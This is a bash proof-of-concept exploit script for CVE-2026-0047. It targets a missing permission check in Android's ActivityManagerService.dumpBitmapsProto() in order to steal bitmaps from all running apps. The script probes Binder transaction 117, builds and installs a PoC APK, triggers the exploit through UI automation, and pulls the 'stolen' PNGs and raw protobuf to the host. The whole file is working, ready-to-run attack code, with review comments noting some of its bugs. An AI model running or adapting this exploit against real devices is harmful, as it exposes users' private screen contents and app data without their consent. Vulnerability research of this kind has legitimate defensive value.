#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# CVE-2026-0047 — Single-Shot PoC Exploit Script
#
# Exploits the missing permission check in ActivityManagerService.dumpBitmapsProto()
# on Android 16 QPR2 Beta (Baklava) to steal bitmaps from all running apps.
#
# Prerequisites:
#   - Android SDK with emulator, platform-tools, and build-tools installed
#   - Java 17+
#   - A running Baklava emulator (see setup below) or ADB-connected device
#     with security patch < 2026-03-01
#
# Emulator setup (one-time):
#   sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"
#   avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"
#   emulator -avd baklava &
#
# Usage:
#   chmod +x exploit.sh
#   ./exploit.sh                    # build, install, exploit, pull results
#   ./exploit.sh --skip-build       # skip build, just run exploit on device
#   ./exploit.sh --setup-emulator   # create and boot emulator first
# ──────────────────────────────────────────────────────────────────────────────
# Abort on the first failing command, unset variable, or failed pipeline stage.
# Several pipelines below (gradlew | tail, install | grep -v, logcat | grep | tail)
# inherit this: a non-zero status in any stage ends the script.
set -euo pipefail

# ANSI colour escapes consumed by the log helpers below (RST resets attributes).
RED='\033[0;31m'
GRN='\033[0;32m'
CYN='\033[0;36m'
YLW='\033[1;33m'
RST='\033[0m'

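# Informational progress line on stdout (cyan "[*]" prefix).
# Arguments: $1 - message, printed verbatim (no escape interpretation).
# Globals:   CYN, RST (read)
log()  { printf '%b[*]%b %s\n' "$CYN" "$RST" "$1"; }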
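# Success line on stdout (green "[+]" prefix).
# Arguments: $1 - message, printed verbatim (no escape interpretation).
# Globals:   GRN, RST (read)
ok()   { printf '%b[+]%b %s\n' "$GRN" "$RST" "$1"; }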
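# Warning line on stderr (yellow "[!]" prefix) so it survives stdout capture.
# Arguments: $1 - message, printed verbatim (no escape interpretation).
# Globals:   YLW, RST (read)
warn() { printf '%b[!]%b %s\n' "$YLW" "$RST" "$1" >&2; }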
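# Error line on stderr (red "[-]" prefix) so it survives stdout capture.
# Arguments: $1 - message, printed verbatim (no escape interpretation).
# Globals:   RED, RST (read)
err()  { printf '%b[-]%b %s\n' "$RED" "$RST" "$1" >&2; }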
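# Report a fatal error through err() and terminate the script.
# Arguments: $1 - message; $2 - exit status (optional, default 1).
die()  { err "$1"; exit "${2:-1}"; }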

# Runtime flags; only the command-line switches below can change them.
SKIP_BUILD=false
SETUP_EMU=false
OUTPUT_DIR="./stolen_bitmaps"

# Accept exactly the two documented switches; anything else is a usage error.
# Positional parameters are iterated, not shifted, so "$@" stays intact.
for opt in "$@"; do
    if [[ "$opt" == "--skip-build" ]]; then
        SKIP_BUILD=true
    elif [[ "$opt" == "--setup-emulator" ]]; then
        SETUP_EMU=true
    else
        die "Unknown argument: $opt"
    fi
done

# ── Emulator setup ──────────────────────────────────────────────────────────
# Only taken with --setup-emulator: fetch the system image, (re)create an AVD and
# block until the device reports boot completion.
# NOTE(review): the header comment and the preflight hint both name the AVD
# 'baklava', while this path creates 'baklava-vuln' — the two should agree.
if $SETUP_EMU; then
    log "Setting up Baklava emulator..."
    echo ""
    warn "Downloading Android 16 QPR2 Beta system image (~2GB)..."
    sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a" || \
        die "Failed to download system image. Run: sdkmanager --list | grep Baklava"

    log "Creating AVD 'baklava-vuln'..."
    # "no" is piped in to answer avdmanager's interactive prompt (presumably the
    # custom hardware profile question); --force overwrites an existing AVD.
    echo "no" | avdmanager create avd \
        -n baklava-vuln \
        -k "system-images;android-Baklava;google_apis;arm64-v8a" \
        --force

    log "Booting emulator..."
    # Backgrounded and never waited on or killed; EMU_PID is only used for the log line.
    emulator -avd baklava-vuln -no-snapshot-load -gpu swiftshader_indirect &
    EMU_PID=$!

    log "Waiting for emulator to boot (this takes 1-3 minutes)..."
    # NOTE(review): no upper bound — a boot that never completes polls forever.
    adb wait-for-device
    while [ "$(adb shell getprop sys.boot_completed 2>/dev/null)" != "1" ]; do
        sleep 2
    done
    ok "Emulator booted (PID $EMU_PID)"
    echo ""
fi

# ── Preflight checks ────────────────────────────────────────────────────────
log "Checking prerequisites..."

command -v adb >/dev/null 2>&1 || die "adb not found. Install Android SDK platform-tools."

adb get-state >/dev/null 2>&1 || die "No device connected. Boot an emulator first:
    sdkmanager 'system-images;android-Baklava;google_apis;arm64-v8a'
    avdmanager create avd -n baklava -k 'system-images;android-Baklava;google_apis;arm64-v8a'
    emulator -avd baklava &"

# Device fingerprint, reused by the patch-level gate below and the final report.
# NOTE(review): the extraction loop at the end of this script strips a trailing CR
# from adb shell output, but nothing is stripped here — confirm these values are
# clean on the hosts this runs on, or the string comparison below may misfire.
PATCH_LEVEL=$(adb shell getprop ro.build.version.security_patch 2>/dev/null)
BUILD=$(adb shell getprop ro.build.display.id 2>/dev/null)
SDK=$(adb shell getprop ro.build.version.sdk 2>/dev/null)

echo ""
echo "  Device:       $(adb shell getprop ro.product.model)"
echo "  Build:        $BUILD"
echo "  SDK:          $SDK"
echo "  Patch level:  $PATCH_LEVEL"
echo ""

# String (lexicographic) comparison of YYYY-MM-DD values. Because "2025..." already
# sorts below "2026-02-28", the second clause never changes the outcome.
# This is advisory only: the script continues regardless.
if [[ "$PATCH_LEVEL" > "2026-02-28" ]] && [[ "$PATCH_LEVEL" != "2025"* ]]; then
    warn "Patch level $PATCH_LEVEL >= 2026-03-01 — device may be patched."
    warn "The exploit will still run but expect SecurityException."
    echo ""
fi

# No hidden_api_policy needed — raw Binder transact bypasses hidden API entirely
echo ""

# ── Phase 1: Raw Binder probe ───────────────────────────────────────────────
log "Phase 1: Raw Binder transaction probe..."
log "Sending transaction #117 (dumpBitmapsProto) to IActivityManager..."
echo ""

# Combined stdout+stderr of the `service call` reply. Everything below is
# substring matching on this text, so a changed message format changes the verdict.
# NOTE(review): under set -e a non-zero exit from adb here ends the script before
# the reply is classified. The transaction code is hard-coded; presumably it is
# only meaningful for the IActivityManager build the PoC targets — confirm.
PROBE=$(adb shell "service call activity 117" 2>&1)

# A permission failure is the "patched" outcome and is reported as a normal
# result (exit 0), not as a script error.
if echo "$PROBE" | grep -qi "SecurityException\|Permission.Denial"; then
    err "PATCHED: SecurityException returned."
    err "This device enforces DUMP permission on dumpBitmapsProto()."
    echo ""
    echo "$PROBE"
    exit 0
fi

# Heuristic verdict only: any mention of the target method, or a plain error
# status, is read as "dispatched without a permission check".
# NOTE(review): "fffffffc" is matched as a bare hex substring anywhere in the
# reply; presumably the intent is a -4 status word — confirm before trusting it.
if echo "$PROBE" | grep -qi "dumpBitmapsProto\|ActivityManagerService\|NullPointerException"; then
    ok "METHOD REACHED — no SecurityException!"
    ok "CVE-2026-0047 confirmed: dumpBitmapsProto() has no permission check."
elif echo "$PROBE" | grep -q "fffffffc"; then
    ok "Binder returned error code but NO SecurityException."
    ok "Method was dispatched without permission check."
else
    warn "Unexpected response. Continuing with Phase 2..."
fi
echo ""

# ── Phase 2: Build the PoC app ──────────────────────────────────────────────
# Resolve the project root from the script's own location so the gradlew and APK
# paths do not depend on the caller's working directory.
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
APK_PATH="$SCRIPT_DIR/app/build/outputs/apk/debug/app-debug.apk"

if ! $SKIP_BUILD; then
    if [ -f "$SCRIPT_DIR/gradlew" ]; then
        log "Phase 2: Building PoC APK..."
        # NOTE(review): this cd is never undone, and OUTPUT_DIR is relative
        # ("./stolen_bitmaps"), so results land under SCRIPT_DIR on this path but
        # under the caller's cwd with --skip-build.
        cd "$SCRIPT_DIR"
        chmod +x gradlew
        # With pipefail, a failing gradle run aborts the script here even though
        # tail itself succeeds; only the last 3 lines of output are shown.
        ./gradlew :app:assembleDebug -q 2>&1 | tail -3
        ok "APK built: $APK_PATH"
    else
        die "gradlew not found in $SCRIPT_DIR. Run from the PoC project root."
    fi
else
    log "Phase 2: Skipping build (--skip-build)"
    [ -f "$APK_PATH" ] || die "APK not found at $APK_PATH. Run without --skip-build first."
fi
echo ""

# ── Phase 3: Install and exploit ────────────────────────────────────────────
log "Phase 3: Installing PoC app..."
# NOTE(review): with pipefail active, this line also aborts the script when
# `grep -v` selects nothing, i.e. when adb install prints no non-empty line — confirm.
adb install -r "$APK_PATH" 2>&1 | grep -v "^$"
ok "Installed com.poc.cve20260047"
echo ""

# Bring a system app to the foreground first; per the log line, the point is to
# have rendered UI present when the PoC runs.
log "Opening Settings app (target with visible UI bitmaps)..."
adb shell am start -n com.android.settings/.Settings >/dev/null 2>&1
sleep 2

log "Launching PoC exploit..."
adb shell am start -n com.poc.cve20260047/.MainActivity >/dev/null 2>&1
sleep 2

# Find the exploit button and tap it
# The UI hierarchy dump at /sdcard/poc_ui.xml is never removed, so it remains on
# the device as an artifact of this run.
log "Triggering dumpBitmapsProto() exploit via UI..."
adb shell uiautomator dump /sdcard/poc_ui.xml >/dev/null 2>&1
# Pull the "[x1,y1][x2,y2]" bounds of the btnRealCve node out of the dump.
# `|| true` keeps a missing node from tripping set -e so the fallback tap can run.
BOUNDS=$(adb shell cat /sdcard/poc_ui.xml 2>/dev/null | \
    grep -o 'resource-id="com.poc.cve20260047:id/btnRealCve"[^>]*' | \
    grep -o 'bounds="\[[0-9]*,[0-9]*\]\[[0-9]*,[0-9]*\]"' | \
    grep -o '\[.*\]' || true)

if [ -n "$BOUNDS" ]; then
    # Tap the centre of the bounding box.
    X1=$(echo "$BOUNDS" | sed 's/\[\([0-9]*\),.*/\1/')
    Y1=$(echo "$BOUNDS" | sed 's/\[[0-9]*,\([0-9]*\)\].*/\1/')
    X2=$(echo "$BOUNDS" | sed 's/.*\[\([0-9]*\),.*/\1/')
    Y2=$(echo "$BOUNDS" | sed 's/.*\[[0-9]*,\([0-9]*\)\]/\1/')
    TX=$(( (X1 + X2) / 2 ))
    TY=$(( (Y1 + Y2) / 2 ))
    adb shell input tap "$TX" "$TY"
    ok "Tapped exploit button at ($TX, $TY)"
else
    # NOTE(review): fixed fallback coordinates; presumably only valid for the
    # emulator profile the PoC was written against — confirm.
    warn "Could not find button via uiautomator, trying default coordinates..."
    adb shell input tap 540 736
fi

# Fixed delay; nothing here waits on a completion signal from the app.
log "Waiting for exploit to complete (up to 20 seconds)..."
sleep 20
echo ""

# ── Phase 4: Extract results ────────────────────────────────────────────────
log "Phase 4: Extracting stolen bitmaps..."
mkdir -p "$OUTPUT_DIR"

# Count and size what the app wrote to its private files/ directory. run-as is
# usable because the installed APK is the debug build. Both assignments fall back
# to a value rather than aborting under set -e.
FILE_COUNT=$(adb shell "run-as com.poc.cve20260047 ls files/ 2>/dev/null" | grep -c "stolen_bitmap_" || true)
BIN_SIZE=$(adb shell "run-as com.poc.cve20260047 stat -c%s files/stolen_bitmaps.bin 2>/dev/null" || echo "0")

# The 2>/dev/null silences test's complaint if FILE_COUNT is not an integer; the
# comparison then simply fails and the else branch runs.
if [ "$FILE_COUNT" -gt 0 ] 2>/dev/null; then
    ok "Found $FILE_COUNT stolen PNG files on device!"
    echo ""

    # NOTE(review): word-splitting of the unquoted $(...) is what separates the
    # names here; it only holds because these file names contain no whitespace.
    for f in $(adb shell "run-as com.poc.cve20260047 ls files/" 2>/dev/null | grep "stolen_bitmap_.*\.png"); do
        # adb shell output may terminate lines with CR; strip it before using the name as a path.
        f=$(echo "$f" | tr -d '\r')
        adb shell "run-as com.poc.cve20260047 cat files/$f" > "$OUTPUT_DIR/$f" 2>/dev/null
    done

    adb shell "run-as com.poc.cve20260047 cat files/stolen_bitmaps.bin" > "$OUTPUT_DIR/raw_protobuf.bin" 2>/dev/null

    # Sanity check: count files that `file` identifies as PNG instead of trusting the name.
    VALID=0
    for png in "$OUTPUT_DIR"/stolen_bitmap_*.png; do
        if file "$png" 2>/dev/null | grep -q "PNG image"; then
            VALID=$((VALID + 1))
        fi
    done

    echo ""
    echo "  ══════════════════════════════════════════"
    echo "  CVE-2026-0047 EXPLOIT RESULTS"
    echo "  ══════════════════════════════════════════"
    echo ""
    echo "  Device:           $(adb shell getprop ro.product.model)"
    echo "  Build:            $BUILD"
    echo "  Patch level:      $PATCH_LEVEL"
    echo ""
    echo "  Raw protobuf:     $BIN_SIZE bytes"
    echo "  PNG files:        $FILE_COUNT extracted"
    echo "  Valid PNGs:       $VALID confirmed"
    echo "  Output dir:       $OUTPUT_DIR/"
    echo ""
    echo "  Permissions used: NONE"
    echo ""
    echo "  ══════════════════════════════════════════"
    echo ""

    ok "Stolen bitmaps saved to $OUTPUT_DIR/"
    log "View them with: open $OUTPUT_DIR/ (macOS) or xdg-open $OUTPUT_DIR/ (Linux)"
    echo ""

    ls -lhS "$OUTPUT_DIR"/stolen_bitmap_*.png 2>/dev/null | head -10
    echo ""

else
    # Nothing was written: surface the app's own log lines (its log tag appears
    # to be CVE-PoC, inferred from this filter) and keep a screenshot as evidence.
    warn "No bitmap files found. Checking logcat for exploit status..."
    echo ""
    # NOTE(review): with pipefail, a grep that matches nothing returns 1 and ends
    # the script here, before the screenshot below is taken — confirm that is intended.
    adb logcat -d | grep -i "CVE-PoC\|dumpBitmap\|SecurityException" | tail -20
    echo ""

    # Take screenshot of result
    # /sdcard/poc_result.png is left on the device after the pull.
    adb shell screencap -p /sdcard/poc_result.png 2>/dev/null
    adb pull /sdcard/poc_result.png "$OUTPUT_DIR/exploit_screenshot.png" 2>/dev/null
    log "Screenshot saved to $OUTPUT_DIR/exploit_screenshot.png"
fi